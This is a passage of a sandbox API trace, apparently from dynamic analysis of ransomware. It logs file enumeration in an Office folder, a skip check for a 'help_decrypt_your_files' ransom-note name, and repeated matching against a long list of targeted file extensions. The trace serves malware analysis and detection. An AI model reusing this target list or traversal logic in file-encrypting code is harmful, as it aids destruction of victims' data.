sv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0171.258] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xb52d3978, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySite.ico", cAlternateFileName="")) returned 1
	[0171.258] lstrcmpW (lpString1="MySite.ico", lpString2="..") returned 1
	[0171.258] lstrcmpW (lpString1="MySite.ico", lpString2=".") returned 1
	[0171.258] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\Office\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\") returned="C:\\Users\\All Users\\Microsoft\\Office\\"
	[0171.258] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\", lpString2="MySite.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\MySite.ico") returned="C:\\Users\\All Users\\Microsoft\\Office\\MySite.ico"
	[0171.258] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Office\\MySite.ico") returned 46
	[0171.258] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.258] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Office\\MySite.ico", cchLength=0x2e | out: lpsz="c:\\users\\all users\\microsoft\\office\\mysite.ico") returned 0x2e
	[0171.259] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.259] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\mysite.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.259] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\office\\mysite.ico" | out: lpString1="c:\\users\\all users\\microsoft\\office\\mysite.ico") returned="c:\\users\\all users\\microsoft\\office\\mysite.ico"
	[0171.260] lstrlenW (lpString="c:\\users\\all users\\microsoft\\office\\mysite.ico") returned 46
	[0171.260] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.261] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0171.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.261] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0171.261] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xb94a03dd, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointPortalSite.ico", cAlternateFileName="SHAREP~1.ICO")) returned 1
	[0171.261] lstrcmpW (lpString1="SharePointPortalSite.ico", lpString2="..") returned 1
	[0171.261] lstrcmpW (lpString1="SharePointPortalSite.ico", lpString2=".") returned 1
	[0171.262] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\Office\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\") returned="C:\\Users\\All Users\\Microsoft\\Office\\"
	[0171.262] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\", lpString2="SharePointPortalSite.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\SharePointPortalSite.ico") returned="C:\\Users\\All Users\\Microsoft\\Office\\SharePointPortalSite.ico"
	[0171.262] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Office\\SharePointPortalSite.ico") returned 60
	[0171.262] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.262] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Office\\SharePointPortalSite.ico", cchLength=0x3c | out: lpsz="c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico") returned 0x3c
	[0171.262] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.262] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.262] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico" | out: lpString1="c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico") returned="c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico"
	[0171.262] lstrlenW (lpString="c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico") returned 60
	[0171.263] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.263] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.263] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0171.263] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.263] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0171.263] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xb94caf8f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointTeamSite.ico", cAlternateFileName="SHAREP~2.ICO")) returned 1
	[0171.264] lstrcmpW (lpString1="SharePointTeamSite.ico", lpString2="..") returned 1
	[0171.264] lstrcmpW (lpString1="SharePointTeamSite.ico", lpString2=".") returned 1
	[0171.264] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\Office\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\") returned="C:\\Users\\All Users\\Microsoft\\Office\\"
	[0171.264] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\", lpString2="SharePointTeamSite.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\SharePointTeamSite.ico") returned="C:\\Users\\All Users\\Microsoft\\Office\\SharePointTeamSite.ico"
	[0171.264] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Office\\SharePointTeamSite.ico") returned 58
	[0171.264] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.264] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Office\\SharePointTeamSite.ico", cchLength=0x3a | out: lpsz="c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico") returned 0x3a
	[0171.264] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
